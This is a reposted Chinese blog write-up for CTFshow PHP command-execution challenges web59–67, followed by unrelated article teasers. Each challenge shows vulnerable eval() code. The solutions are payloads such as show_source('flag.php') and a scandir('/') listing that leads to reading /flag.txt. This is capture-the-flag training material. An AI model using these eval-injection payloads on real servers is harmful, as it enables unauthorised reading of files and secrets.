CTFshow web(php命令执行59-67）

CTFshow web(php命令执行59-67）

news/2025/10/31 9:08:03/文章来源:https://blog.csdn.net/csjjjd/article/details/136106174

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);

payload:c=show_source('flag.php');

我还是那句话：如果不知道对面过滤了啥，那就一个一个尝试

解释：在 PHP 中，show_source() 是一个内置函数，用于打开并显示指定文件的源代码。该函数接受一个文件名作为参数，并将该文件的内容以文本形式进行输出。

下面是我的文章对命令执行常用语句的总结：来源于：一篇文章带你进阶CTF命令执行-CSDN博客

我不想太多，一个个丢进去，看那个可以就是那个

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这里还是上一个payload：

c=show_source('flag.php');

或者：c=highlight_file('flag.php');

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这题是真的离谱，这个payload已经一路过关斩将了

c=show_source('flag.php');

当然得换个绕法：

c=include('flag.php);echo $flag;

这里是文件包含然后再输出变量

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web64

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

没错，又又又是那个payload，他还在输出！

c=show_source('flag.php');

web66

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

额，这波被制裁了，不能白嫖了，那就靠实力了！

c=print_r(scandir("/"));

这里首先先翻看根目录，查看源代码，接着发现了flag.txt

c=highlight_file('/flag.txt');

知道flag在根目录下面的flag.txt直接访问就好了

web67

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还是上面那道题目的方法：

payload:c=highlight_file('/flag.txt');

真诚希望我的文章能够帮助大家,谢谢！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/682278.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

一个 SpringBoot 项目能同时处理多少请求？

一个 SpringBoot 项目能同时处理多少请求？

目录 1 问题分析 2 Demo 3 答案 4 怎么来的？ 5 标准答案及影响参数一Tomcat配置 6 影响参数二 Web容器 7 影响参数三 Async 1 问题分析一个 SpringBoot 项目能同时处理多少请求？ 不知道你听到这个问题之后的第一反应是什么？ 我大概…

阅读更多...

支付交易——BIN服务

支付交易——BIN服务

摘要老王的杂货店里货很多，国产的，进口的，不同种类、不同品牌、不同型号的货，应有尽有。货多了，老王就弄了个小本本记下店里卖的货有哪些，记得很详细，包括有哪些种类，每个种类里有…

阅读更多...

ClickHouse--05--MergeTree 表引擎

ClickHouse--05--MergeTree 表引擎

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录 MergeTree 系列表引擎前言MergeTree 系列表引擎 --功能MergeTree 系列表引擎 --种类 1.MergeTree1.1MergeTree 建表语句：1.2 MergeTree 引擎表目录解析查…

阅读更多...

局部特征描述子与关键点

局部特征描述子与关键点

一、局部特征描述子与关键点之间存在密切的关系关键点（Key Points）： 关键点是在图像、点云或其他数据中具有显著局部特征的点或区域。这些点通常是在数据中表现出局部结构或特征变化的位置，比如曲率极值点、拐点、纹理变化显著的…

阅读更多...

Acwing二分和前缀和（一）

Acwing二分和前缀和（一）

数的范围原题链接：https://www.acwing.com/problem/content/791/ 整数二分步骤，找一个区间，使得答案一定在区间中。找一个判断条件，使得该判断条件具有二段性，并且答案一定是该二段性的分界点。分析终点在该判断条件下…

阅读更多...

【原创】Anaconda安装 Solving Environment错误

【原创】Anaconda安装 Solving Environment错误

conda install XXX 时总是有： Solving environment: failed with initial frozen solve. Retrying with flexible solve. 解决方法： conda config --set channel_priority flexible

阅读更多...

速盾cdn：cdn免费注册

速盾cdn：cdn免费注册

速盾CDN是一家专业的内容分发网络（CDN）服务提供商，为网站提供高速、稳定的访问体验。今天我将为您介绍速盾CDN的注册流程以及其优势。首先，我们来了解一下什么是CDN。CDN是指内容分发网络（Content Delivery Network&…

阅读更多...

toString()、equals()、clone()用法

toString()、equals()、clone()用法

Java中所有类的对象都可以直接使用Object类中提供的一些方法 1. toString()：返回对象的字符串表示形式，通常在类中重写，以便于返回的是对象的内容 2. equals()：判断两个对象的地址是否相等，直接使用也一样，…

阅读更多...

社区店选址地理位置评估：大数据分析的力量

社区店选址地理位置评估：大数据分析的力量

大家好，我是一名有着 5 年开店经验的鲜奶吧创业者。在这 5 年的时间里，我深切地体会到了选址对于一家社区鲜奶吧的重要性。一个好的地理位置可以为你的店铺带来源源不断的客流，而一个糟糕的位置则可能让你的创业之路充满坎坷。在这里&#…

阅读更多...

Qt之条件变量QWaitCondition详解

Qt之条件变量QWaitCondition详解

QWaitCondition内部实现结构图： 相关系列文章 C之Pimpl惯用法目录 1.简介 2.示例 2.1.全局配置 2.2.生产者Producer 2.3.消费者Consumer 2.4.测试例子 3.原理分析 3.1.辅助函数CreateEvent 3.2.辅助函数WaitForSingleObject 3.3.QWaitConditionEvent …

阅读更多...

一个小例子，告诉你什么是衍生式设计

一个小例子，告诉你什么是衍生式设计

之前好多小伙伴想让我介绍介绍Dynamo与衍生式设计，奈何最近太忙了，实在没时间弄这些~趁着端午节，今天用一个小案例，先简单让大家对衍生式设计有个初步认识，之后有时间，我再多写几篇关于这方面的文章&#x…

阅读更多...

Java使用opencsv完成对csv批量操作

Java使用opencsv完成对csv批量操作

文章目录前言一、maven二、造数三、代码部分1.OpenCsvController2.OpenCsvUtil3.StudentInfo4.CodeToValue 三、效果展示1.download2.upload 总结前言 csv文件是不同于excel文件的另一种文件，常常以,作为分隔符，本篇将通过JavaBean的形式完成对csv文件…

阅读更多...

Linux_进程地址空间

Linux_进程地址空间

我们用c语言写的程序，经过编译后形成可执行程序存放在硬盘。当运行该程序时，操作系统将该程序加载到内存中，创建进程控制块，变为进程，然后开始执行该程序。大家是否想过，操作系统是如何加载的呢&#xff1b…

阅读更多...

25天物理探索旅程 - 第三天：相对论时空观的构建

25天物理探索旅程 - 第三天：相对论时空观的构建

第三天的课堂，我们将踏上一段穿越时空的奇幻旅程，探索那个由爱因斯坦用天才智慧构建起来的相对论世界。想象一下，你手握一把名为“狭义相对论”的神奇钥匙，准备开启一扇通往全新宇宙观的大门。首先，我们来聊聊同时性…

阅读更多...

【c语言】字符串常见函数下

【c语言】字符串常见函数下

🎈个人主页：甜美的江 🎉欢迎 👍点赞✍评论⭐收藏 🤗收录专栏：c语言 🤝希望本文对您有所裨益，如有不足之处，欢迎在评论区提出指正，让我们共同学习、交流进步&a…

阅读更多...

如何在我们的模型中使用Beam search

如何在我们的模型中使用Beam search

在上一篇文章中我们具体探讨了Beam search的思想以及Beam search的大致工作流程。根据对Beam search的大致流程我们已经清楚了，在这我们来具体实现一下Beam search并应用在我们的seq2seq任务中。 1. python中的堆（heapq） 堆是一种特殊的树形…

阅读更多...

速盾：2024年cdn在5g时代重要吗

速盾：2024年cdn在5g时代重要吗

在2024年，随着5G技术的普及与应用，内容分发网络（Content Delivery Network，CDN）在数字化时代中的重要性将进一步巩固和扩大。CDN是一种用于快速、高效地分发网络内容的基础设施，它通过将内容部署在全球各地…

阅读更多...

幻兽帕鲁Palworld服务器设置参数（汉化）

幻兽帕鲁Palworld服务器设置参数（汉化）

创建幻兽帕鲁服务器配置参数说明，Palworld服务器配置参数与解释，阿腾云atengyun.com分享： 自建幻兽帕鲁服务器教程： 阿里云教程 https://t.aliyun.com/U/bLynLC腾讯云教程 https://curl.qcloud.com/oRMoSucP 幻兽帕鲁服务器幻…

阅读更多...

with 用法

with 用法

with 已弃用: 不再推荐使用该特性。虽然一些浏览器仍然支持它，但也许已从相关的 web 标准中移除，也许正准备移除或出于兼容性而保留。请尽量不要使用该特性，并更新现有的代码；参见本页面底部的兼容性表格以指导你作出决定。请注意…

阅读更多...

寒假学习记录16：Express框架（Node）

寒假学习记录16：Express框架（Node）

后续会补充 1.引入express 1.先下载express框架创建一个package.json格式的文件，里面写入 {"dependencies": {"express": "~4.16.1" //express版本号} } 然后打开终端输入 npm i 2.引入express模块 const express require(&quo…

阅读更多...

最新文章